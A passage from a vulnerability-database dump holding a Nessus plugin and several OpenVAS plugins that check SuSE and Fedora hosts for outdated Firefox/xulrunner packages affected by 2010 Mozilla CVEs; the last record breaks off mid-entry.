found while investigating an\n intrusion attempt on a customer network. The underlying\n vulnerability, however, was present on both the Firefox\n 3.5 and Firefox 3.6 development branches and affected\n all supported platforms. (MFSA 2010-73 / CVE-2010-3765)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-64.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-65.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-66.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-67.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-68.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-69.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-70.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-71.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-73.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3170.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3176.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3177.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3179.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3180.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3182.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3183.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3765.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3557 / 3558 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "50952", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs"]}
{"openvas": [{"lastseen": "2018-01-02T10:54:51", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050074.html", "2010-16897"], "pluginID": "1361412562310862605", "description": "Check for the Version of perl-Gtk2-MozEmbed", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "title": "Fedora Update for perl-Gtk2-MozEmbed FEDORA-2010-16897", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2017-12-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862605", "id": "OPENVAS:1361412562310862605", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-Gtk2-MozEmbed FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"perl-Gtk2-MozEmbed on Fedora 14\";\ntag_insight = \"This module allows you to use the Mozilla embedding widget from Perl.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050074.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862605\");\n script_version(\"$Revision: 8250 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 08:29:15 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for perl-Gtk2-MozEmbed FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl-Gtk2-MozEmbed\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-Gtk2-MozEmbed\", rpm:\"perl-Gtk2-MozEmbed~0.08~6.fc14.21\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:16", "references": ["2010-16897", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050079.html"], "pluginID": "1361412562310862623", "description": "Check for the Version of gnome-python2-extras", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "type": "openvas", "title": "Fedora Update for gnome-python2-extras FEDORA-2010-16897", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-01-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862623", "id": "OPENVAS:1361412562310862623", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gnome-python2-extras FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"gnome-python2-extras on Fedora 14\";\ntag_insight = \"The gnome-python-extra package contains the source packages for additional\n Python bindings for GNOME. It should be used together with gnome-python.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050079.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862623\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for gnome-python2-extras FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of gnome-python2-extras\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"gnome-python2-extras\", rpm:\"gnome-python2-extras~2.25.3~25.fc14.1\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:05:43", "references": ["2010-16897", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050078.html"], "pluginID": "1361412562310862651", "description": "Check for the Version of xulrunner", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-12-02T00:00:00", "title": "Fedora Update for xulrunner FEDORA-2010-16897", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-01-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862651", "id": "OPENVAS:1361412562310862651", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xulrunner FEDORA-2010-16897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xulrunner on Fedora 14\";\ntag_insight = \"XULRunner provides the XUL Runtime environment for Gecko applications.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050078.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862651\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16897\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for xulrunner FEDORA-2010-16897\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xulrunner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.12~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:04:48", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050159.html"], "pluginID": "1361412562310862531", "description": "Check for the Version of mozvoikko", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "title": "Fedora Update for mozvoikko FEDORA-2010-16885", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862531", "id": "OPENVAS:1361412562310862531", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mozvoikko FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mozvoikko on Fedora 12\";\ntag_insight = \"This is mozvoikko, an extension for Mozilla programs for using the Finnish\n spell-checker Voikko.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050159.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862531\");\n script_version(\"$Revision: 8447 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:12:19 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3183\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3182\", \"CVE-2010-3765\");\n script_name(\"Fedora Update for mozvoikko FEDORA-2010-16885\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mozvoikko\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"mozvoikko\", rpm:\"mozvoikko~1.0~14.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:06:11", "references": ["2010-16885", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050153.html"], "pluginID": "1361412562310862499", "description": "Check for the Version of firefox", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "title": "Fedora Update for firefox FEDORA-2010-16885", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-01-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862499", "id": "OPENVAS:1361412562310862499", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for firefox FEDORA-2010-16885\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"firefox on Fedora 12\";\ntag_insight = \"Mozilla Firefox is an open-source web browser, designed for standards\n compliance, performance and portability.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050153.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862499\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-16885\");\n script_cve_id(\"CVE-2010-3175\", 